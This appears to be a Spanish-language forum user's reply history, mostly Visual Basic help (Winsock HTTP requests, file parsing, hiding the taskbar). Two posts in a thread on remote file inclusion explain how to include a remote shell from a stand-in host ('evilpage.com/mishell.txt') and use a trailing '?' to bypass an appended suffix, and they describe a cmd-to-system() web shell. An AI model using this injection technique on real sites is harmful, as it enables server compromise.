|
11
|
Programación / Programación Visual Basic / Re: enviar datos de visual basic a una pagina web
|
en: 21 Marzo 2008, 00:56 am
|
Hmm, probemos: Private Sub Form_Load() Dim segViejo&, segNuevo&, Segundos As Byte segViejo = Int(Timer) segNuevo = 0 Ws.Connect "www.dequito.com", 80 Segundos = 0 Do If segViejo <> segNuevo Then segNuevo = segViejo Segundos = Segundos + 1 If Segundos = 5 Then MsgBox "Imposible conectar" Exit Sub End If End If segViejo = Timer DoEvents Loop Until Ws.State = sckConnected MsgBox "Conectado con éxito" End Sub
Lo que hace es un loop en el que comprueba si el estado del winsock es conectado, si es conectado muestra el mensaje de que se ha conectado con éxito, y si el estado no es conectado mientras se hace el bucle, comprueba si no han pasado mas de cinco segundos, lo puse arbitrario, porque creo que cinco segundos es mas o menos lo que debe tardar en realizarce la sola conexión, si te sale que es imposible conectarse, y con la página que diste quizas sea un error en una librería de código de tu compu, o reglas del firewall, en fin. Si te conecta lo que queres decir es que no te está retornando el código html de la página. Para ello nos debemos fijar y seguir el protocolo: GET /recurso HTTP/1.1 Host: www.dequito.comConnection: Close en visual: Private Sub Form_Load() Dim segViejo&, segNuevo&, Segundos As Byte Dim Request$ segViejo = Int(Timer) segNuevo = 0 Ws.Connect "www.dequito.com", 80 Segundos = 0 Do If segViejo <> segNuevo Then segNuevo = segViejo Segundos = Segundos + 1 If Segundos = 5 Then MsgBox "Imposible conectar" Exit Sub End If End If segViejo = Timer DoEvents Loop Until Ws.State = sckConnected Request = "GET /recurso HTTP/1.1" & vbCrLf & _ "Host: www.dequito.com" & vbCrLf & _ "Connection: Close" & vbCrLf & vbCrLf Ws.SendData Request End Sub
Todo el code y eso lo hice sin probar, así que puede que hayan errores, espero que no . Mira haber si eso te sirve, sino es así, hace mucho publique acá un minimanual de este tipo de conexiones, quizas te sirva Acá el link: http://foro.elhacker.net/index.php/topic,186798.0.htmlSaludos
|
|
|
12
|
Seguridad Informática / Nivel Web / Re: duda con RFI.......
|
en: 4 Marzo 2008, 01:38 am
|
lo que hace el "?" es que se ejecute la shell o no? No, lo que hace el "?", es separar la parte "real" de la parte "imaginaria" Te explico más. Tenes este código: include $_GET['a'].'_template.php';
La inclusión normal sería: ...?a=http://evilpage.com/mishell.txt Pero si haces esto así normal, te saldría un error porque en realidad estaría incluyendo el archivo http://evilpage.com/mishell.txt_template.phpPara hacerle el escape a eso y no incluya el archivo "mishell.txt_template.php", se utiliza el "?" que me parece que también se llama porción de consulta, que es la que contiene las variables get en la petición. En total quedaría: ...?a=http://evilpage.com/mishell.txt? y el resto que se incluye es como si fuera una variable get include(' http://evilpage.com/mishell.txt?_template.php'); Siendo _template.php una variable ¿Si no has podido ejecutar scripts como sabes q es vulnerable a RFI? Prueba a ejecutar un script básico como: Porque mira que warlock394 dijo: "pero no se ejecuta, simplemente muestra el codigo fuente de la shell" Significa que no hay inclusión remota, que puede ser como dije mas arriba: $pag = $_GET['pag_dest'];
modified. y sorry por revivir el post pero no lo había visto, y me veía "obligado" a responder saludos.
|
|
|
15
|
Seguridad Informática / Desafíos - Wargames / Re: Aristoteles y el abogado (problema complicado)
|
en: 27 Febrero 2008, 23:54 pm
|
Me equivoqué en vez de mandarte la respuesta la publiqué, pero la cambié a tiempo...
Y recuerden es -HadeS- no un tal HaDeS que quiere sacar crédito ajeno..
Que pasa pto, yo no he sacado crédito de nada, sos vos el que en un post dijiste que lo habías hecho fácil. No necesito sacar crédito de nada, porque no lo necesito! Modificado: Ademas se nota que se te subió el ego, con eso de "recuerden que soy yo y no otro", "el único que resolvió el reto fuí yo". Ve bajandote de esa nube en la que te montaste, porque desde lejos se nota que eres un pobre noob
|
|
|
16
|
Seguridad Informática / Nivel Web / Re: duda con RFI.......
|
en: 7 Febrero 2008, 23:37 pm
|
... la gente que no tiene ni la minima idea de php, usa las shells c99 y todas esas que te lo hacen casi todo automatico, pero no saben como funcionan.
$cmd es una variable global, con $_GET hacemos una peticion. todo lo que pongamos despues del parametro cmd se ejecutara con system y nos mostrara el resultado del comando. ...
Se ve que no tenes la mínima idea de php, con $_GET no se hace ninguna petición, con $_GET se retornan los valores de una variable identificada por nombre x en el GET de una petición. GET /abc?a=123 HTTP/1.1 Host:...
$variable = $_GET['a']; echo $variable
Respuesta: 123 Ademas él dice que se muestra el contenido del archivo, por lo que logicamente no se trata de una inclusión, sino de la lectura e impresión de datos como lo puse más arriba. Si me respondias lo de "Explicame que hace exactamente el "?" Saludos!, solo respondeme vos!" Pues no respondiste lo que era. Y de paso explico que es el ? Lo que hay por delante del ? en las peticiones, es denominado porción de consulta, y es donde se encuentran las variables que se mandan al servidor. eso era todo, se utiliza el ? en las inclusiones, para que el sufijo que se le añade a la variable sea parte de la porción de consulta, y no sea incluido como un solo archivo. Saludos
|
|
|
17
|
Programación / Programación Visual Basic / Re: Casi nada de Programación solo de Logica. :O
|
en: 19 Diciembre 2007, 07:29 am
|
Si esa es toda la línea completa, intenta con esto a ver si te sale: Private Sub Form_Load() Dim data As String Dim vdata As Variant Open "D:\Foros\SMF\Backup\localhost.sql" For Input As #1 data = Input$(LOF(1), #1) Close #1 x = Split(data, vbCrLf) For i = 0 To UBound(x) y = Split(x(i), ",") Text2.Text = Text2.Text & Replace(y(1), "'", "") & vbCrLf Next i End Sub
Conteste tarde, entonces creo que ya sacó todos los datos manualmente xD saludos!
|
|
|
19
|
Programación / Programación Visual Basic / Re: ocultar las ventanas de conversacion de msn
|
en: 15 Noviembre 2007, 04:07 am
|
A lo que se refiere lympex, es que al "List1.list" le tenes que pasar un parámetro que indica la posición del cursor sobre el listado, como no se puede agarrar todos los datos del list de una vez, tenes que hacer un bucle que recorra cada elemento de dicho list, así: dim i% for i= 0 to list1.listcount Window = FindWindow(vbNullString, List1.List(i)) 'funciones para mandar el archivo next i
Y dado que le vas a mandar a cada contacto el archivo, te sugiero mejor que no se lo mandes a todos los contactos conectado, sino que escojas del list1 algunos contactos solamente, y que a esos solo les mande el file. If (contacto.Status = 2) Or (contacto.Status = 10) Or (contacto.Status = 14) Or (contacto.Status = 34) Or (contacto.Status = 50) Or (contacto.Status = 66) Then
Esa línea, la podes cambiar por algo más simple: if contacto.status <> 1 then
Ya que 1 representa un contacto offline, si contacto.status devuelve un valor diferente a uno, es porque tiene los demás estados del messenger. Saludos
|
|
|
20
|
Programación / Programación Visual Basic / Re: Barra de inicio
|
en: 13 Noviembre 2007, 22:13 pm
|
Mira Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long Private Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long Dim hwnd_taskbar Private Sub Command1_Click() SetWindowPos hwnd_taskbar, 0, 0, 0, 0, 0, &H80 End Sub Private Sub Command2_Click() SetWindowPos hwnd_taskbar, 0, 0, 0, 0, 0, &H40 End Sub Private Sub Form_Load() hwnd_taskbar = FindWindow("Shell_traywnd", "") End Sub
Utilizamos primero la api FindWindow para buscar el handle de la barra de inicio, que tiene por nombre "Shell_traywnd", luego de esto, utilizamos el api SetWindowPos para definir una posición de tal handle. El &H80 es para esconder, y el &H40 para mostrar. Si queres que se oculte automáticamente cuando inicie el programa, pones el código dentro del form_load y listo. Saludos;
|
|
|
|
|
|
|